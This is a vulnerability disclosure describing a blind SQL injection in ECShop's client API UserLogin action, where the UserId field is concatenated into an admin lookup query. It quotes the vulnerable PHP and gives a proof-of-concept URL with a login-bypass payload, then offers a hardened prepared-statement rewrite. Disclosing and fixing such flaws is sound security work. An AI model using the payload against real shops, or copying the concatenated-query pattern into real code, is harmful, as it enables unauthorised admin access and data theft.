### Brief description:

I have tested this vulnerability myself and confirmed it exists. When magic quotes are disabled on the server, blind SQL injection is possible, and it is not affected by ECShop's core input filtering. No letdown this time. The affected file is /api/client/api.php; the request method is POST.

### Detailed description:

/api/client/api.php, line 7:

```
dispatch($_POST);
```

/api/client/includes/lib_api.php, lines 6-10:

```
$func_arr = array('GetDomain', 'UserLogin', 'AddCategory', 'AddBrand', 'AddGoods',
                  'GetCategory', 'GetBrand', 'GetGoods', 'DeleteBrand', 'DeleteCategory',
                  'DeleteGoods', 'EditBrand', 'EditCategory', 'EditGoods');
if (in_array($post['Action'], $func_arr) && function_exists('API_' . $post['Action']))
{
    return call_user_func('API_' . $post['Action'], $post);
}
```

When $_POST['Action'] == 'UserLogin', the following function is called (/api/client/includes/lib_api.php, line 246):

```
function API_UserLogin($post)
{
    $post['username'] = isset($post['UserId']) ? trim($post['UserId']) : '';
    $post['password'] = isset($post['Password']) ? strtolower(trim($post['Password'])) : '';

    /* Check whether the password is correct */
    // $post['username'] comes straight from UserId and is concatenated into the query unescaped
    $sql = "SELECT user_id, user_name, password, action_list, last_login" .
           " FROM " . $GLOBALS['ecs']->table('admin_user') .
           " WHERE user_name = '" . $post['username'] . "'";
    $row = $GLOBALS['db']->getRow($sql);

    if ($row)
    {
        if ($row['password'] != $post['password'])
        {
            client_show_message(103);
        }

        require_once(ROOT_PATH . ADMIN_PATH . '/includes/lib_main.php');

        // Login succeeded
        set_admin_session($row['user_id'], $row['user_name'], $row['action_list'], $row['last_login']);

        // Update last login time and IP
        $GLOBALS['db']->query("UPDATE " . $GLOBALS['ecs']->table('admin_user') .
                              " SET last_login='" . gmtime() . "', last_ip='" . real_ip() . "'" .
                              " WHERE user_id='$_SESSION[admin_id]'");

        client_show_message(100, true, VERSION, 0, true, EC_CHARSET);
    }
```

Here UserId is not filtered and is not covered by the core filtering, which results in a blind SQL injection vulnerability.

### Proof of vulnerability:

http://localhost/ecshop/api/client/api.php?Action=UserLogin&UserId=%27%20or%20user_id=1%23

Note: for ease of testing I changed the POST method in the code to GET, and to make the successful injection visible I inserted some code after the SQL is executed to display the result. In a real environment the result shown in the screenshot is not displayed.

![Screenshot of the injection result](https://images.seebug.org/upload/201110/101153596d53bf5dc4d5ef381db7acf5fcb64e4c.png)
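For comparison, here is a hardened rewrite of the lookup in API_UserLogin, added as an example and not ECShop's own code. It assumes a plain mysqli connection (with mysqlnd, for get_result()), the default admin table name `ecs_admin_user`, and uses time() and $_SERVER['REMOTE_ADDR'] in place of ECShop's gmtime() and real_ip(); the point is that binding UserId as a parameter removes the injection independently of magic_quotes_gpc or any upstream filter.

```php
<?php
// Hardened replacement for the admin lookup in API_UserLogin (added example, not ECShop code).
// Assumptions: $db is a mysqli connection and the admin table is "ecs_admin_user"
// (the default "ecs_" prefix; adjust to the installation's prefix).

function api_user_login_hardened(mysqli $db, array $post): ?array
{
    $username = isset($post['UserId']) ? trim($post['UserId']) : '';
    $password = isset($post['Password']) ? strtolower(trim($post['Password'])) : '';
    if ($username === '' || $password === '') {
        return null;
    }

    // UserId is bound as a parameter: a quote, '#' or "or user_id=1" inside it is
    // data, never SQL. This holds whether or not magic_quotes_gpc is on.
    $stmt = $db->prepare(
        'SELECT user_id, user_name, password, action_list, last_login'
        . ' FROM ecs_admin_user WHERE user_name = ?'
    );
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // Same MD5-hex comparison as the original, but constant-time and with a
    // single failure path, so a wrong user and a wrong password look alike.
    if ($row === null || !hash_equals((string) $row['password'], $password)) {
        return null;
    }

    // The original interpolated $_SESSION[admin_id] into the UPDATE; bind that too.
    $now = time();                               // stands in for ECShop's gmtime()
    $ip  = $_SERVER['REMOTE_ADDR'] ?? '';        // stands in for ECShop's real_ip()
    $uid = (int) $row['user_id'];
    $upd = $db->prepare(
        'UPDATE ecs_admin_user SET last_login = ?, last_ip = ? WHERE user_id = ?'
    );
    $upd->bind_param('isi', $now, $ip, $uid);
    $upd->execute();
    $upd->close();

    return $row;   // caller sets the admin session and emits message 100 as before
}
```

The caller still decides the response codes (103 on failure, 100 on success) exactly as the original dispatcher does; only the query construction changed.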